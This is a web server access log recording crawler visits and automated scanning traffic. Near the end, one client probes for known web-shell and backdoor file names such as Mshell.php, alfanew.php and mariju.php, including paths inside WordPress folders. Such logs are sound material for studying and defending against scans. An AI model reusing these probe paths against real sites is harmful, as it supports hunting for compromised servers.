216.73.216.186 - - [12/Aug/2025:04:28:27 -0400] "GET /Public/mobile/css/base.css HTTP/1.1" 301 257 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.186 - - [12/Aug/2025:04:28:27 -0400] "GET /Template/Mobile/js/main.js HTTP/1.1" 301 257 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
173.252.79.116 - - [12/Aug/2025:04:30:44 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
173.252.107.9 - - [12/Aug/2025:04:30:58 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
31.13.127.3 - - [12/Aug/2025:04:31:22 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
173.252.107.3 - - [12/Aug/2025:04:31:25 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
69.171.249.113 - - [12/Aug/2025:04:32:06 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
31.13.103.7 - - [12/Aug/2025:04:32:18 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
69.171.249.9 - - [12/Aug/2025:04:32:44 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
31.13.103.4 - - [12/Aug/2025:04:32:52 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
69.63.189.43 - - [12/Aug/2025:04:34:05 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
31.13.103.113 - - [12/Aug/2025:04:34:26 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
216.73.216.186 - - [12/Aug/2025:04:38:50 -0400] "GET /.well-known/pki-validation HTTP/1.1" 301 257 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
206.189.247.132 - - [12/Aug/2025:04:39:52 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
68.183.245.101 - - [12/Aug/2025:04:39:52 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
144.126.240.247 - - [12/Aug/2025:04:39:52 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
86.8.204.43 - - [12/Aug/2025:04:39:52 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
149.102.237.41 - - [12/Aug/2025:04:42:47 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
209.38.125.40 - - [12/Aug/2025:04:42:47 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
149.22.91.139 - - [12/Aug/2025:04:42:47 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
156.146.41.222 - - [12/Aug/2025:04:42:47 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
152.42.157.60 - - [12/Aug/2025:04:42:57 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
159.89.216.7 - - [12/Aug/2025:04:42:58 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
174.138.112.39 - - [12/Aug/2025:04:42:58 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
170.64.252.169 - - [12/Aug/2025:04:42:58 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
216.73.216.186 - - [12/Aug/2025:04:45:18 -0400] "GET /robots.txt HTTP/1.1" 301 246 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.186 - - [12/Aug/2025:04:45:26 -0400] "GET / HTTP/1.1" 301 236 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
62.141.44.236 - - [12/Aug/2025:04:45:49 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54"
146.190.11.185 - - [12/Aug/2025:04:46:51 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [12/Aug/2025:04:46:51 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
164.90.241.135 - - [12/Aug/2025:04:46:51 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
159.203.144.167 - - [12/Aug/2025:04:46:51 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
68.183.245.101 - - [12/Aug/2025:04:54:42 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [12/Aug/2025:04:54:42 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
86.8.204.43 - - [12/Aug/2025:04:54:42 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
144.126.240.247 - - [12/Aug/2025:04:54:42 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
209.38.125.40 - - [12/Aug/2025:04:55:08 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0"
144.126.240.247 - - [12/Aug/2025:04:55:08 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0"
146.190.203.144 - - [12/Aug/2025:04:55:08 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0"
146.190.190.67 - - [12/Aug/2025:04:55:08 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0"
149.102.237.41 - - [12/Aug/2025:04:57:54 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
209.38.125.40 - - [12/Aug/2025:04:57:54 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
149.22.91.139 - - [12/Aug/2025:04:57:54 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
156.146.41.222 - - [12/Aug/2025:04:57:54 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
143.198.200.162 - - [12/Aug/2025:05:04:18 -0400] "POST /admin_panel/index.php HTTP/1.1" 301 252 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36"
216.73.216.186 - - [12/Aug/2025:05:10:04 -0400] "GET /.well-known/acme-challenge/DS5FXTO985UJI7Q_A1JZP4N_3N1Y_AHQ HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.186 - - [12/Aug/2025:05:10:04 -0400] "GET /bc HTTP/1.1" 301 233 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.186 - - [12/Aug/2025:05:10:04 -0400] "GET /.well-known/acme-challenge/9B4MBPSB0VQD2_-RB10_QVLALIYTI9AC HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.186 - - [12/Aug/2025:05:10:04 -0400] "GET /.well-known/acme-challenge/ZXUU1PNOGK_IDBI6JJZ544F11XYJ0TM0 HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.186 - - [12/Aug/2025:05:10:04 -0400] "GET /.well-known/acme-challenge/PMIFKZL0OYA3GLIOFHS_SM8LD79P_FBG HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
206.189.247.132 - - [12/Aug/2025:05:10:40 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
68.183.245.101 - - [12/Aug/2025:05:10:40 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
86.8.204.43 - - [12/Aug/2025:05:10:40 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
144.126.240.247 - - [12/Aug/2025:05:10:40 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
152.42.157.60 - - [12/Aug/2025:05:11:03 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
159.89.216.7 - - [12/Aug/2025:05:11:04 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
174.138.112.39 - - [12/Aug/2025:05:11:04 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
170.64.252.169 - - [12/Aug/2025:05:11:04 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
149.102.237.41 - - [12/Aug/2025:05:12:45 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
209.38.125.40 - - [12/Aug/2025:05:12:45 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
149.22.91.139 - - [12/Aug/2025:05:12:45 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
156.146.41.222 - - [12/Aug/2025:05:12:45 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
146.190.11.185 - - [12/Aug/2025:05:14:13 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [12/Aug/2025:05:14:13 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
164.90.241.135 - - [12/Aug/2025:05:14:13 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
159.203.144.167 - - [12/Aug/2025:05:14:13 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1"
216.73.216.186 - - [12/Aug/2025:05:17:11 -0400] "GET /.well-known/acme-challenge/EW8BKKPN8TJ84EZUUUCDEQJBO3IHU7Z- HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.186 - - [12/Aug/2025:05:17:16 -0400] "GET /.well-known/acme-challenge/VMFNR1P41B2T4EW-YK7E12EL-8HAMSG0 HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.186 - - [12/Aug/2025:05:17:22 -0400] "GET /.well-known/acme-challenge/_2EYKAKAZQBERDCRLUPNBY41L8B4N32Z HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
4.43.184.114 - - [12/Aug/2025:05:19:03 -0400] "GET / HTTP/1.0" 301 231 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16"
128.199.106.124 - - [12/Aug/2025:05:22:43 -0400] "GET /xmrlpc.php7 HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:43 -0400] "GET /lock360.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:43 -0400] "GET /Mshell.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:44 -0400] "GET /wp-include/xmrlpc.php7 HTTP/1.1" 301 253 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:44 -0400] "GET /.wp-themes.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:44 -0400] "GET /.wp-themes.php7 HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:45 -0400] "GET /edit-comments.php HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:45 -0400] "GET /ern1.PhP7 HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:45 -0400] "GET /heex.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:46 -0400] "GET /inputs.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:46 -0400] "GET /wp-content/themes/travelscape/json.php HTTP/1.1" 301 269 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:47 -0400] "GET /cgi-bin/install.php HTTP/1.1" 301 250 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:47 -0400] "GET /alfanew.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:47 -0400] "GET /.well-known/pkivalidation/bala.php HTTP/1.1" 301 265 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:48 -0400] "GET /ova-tools.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:48 -0400] "GET /wp-content/plugins/wp-daft/t62.php HTTP/1.1" 301 265 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:48 -0400] "GET /wp-content/themes/hello-element/footer.php HTTP/1.1" 301 273 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:49 -0400] "GET /wp-content/plugins/wordpress-three/miin.php HTTP/1.1" 301 274 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:49 -0400] "GET /filefuns.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:49 -0400] "GET /qinfofuns.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:50 -0400] "GET /tempfuns.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:50 -0400] "GET /comdofuns.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:50 -0400] "GET /userfuns.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:51 -0400] "GET /hinfofuns.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:51 -0400] "GET /onclickfuns.php HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:52 -0400] "GET /chtmlfuns.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:52 -0400] "GET /bugz.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:52 -0400] "GET /makeasmtp.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:53 -0400] "GET /wp-mini.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:53 -0400] "GET /wp-includes/sitemaps/providers/mariju.php HTTP/1.1" 301 272 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:53 -0400] "GET /wp-admin/css/colors/coffee/mariju.php HTTP/1.1" 301 268 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
128.199.106.124 - - [12/Aug/2025:05:22:54 -0400] "GET /cgi-bin/mariju.php HTTP/1.1" 301 249 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
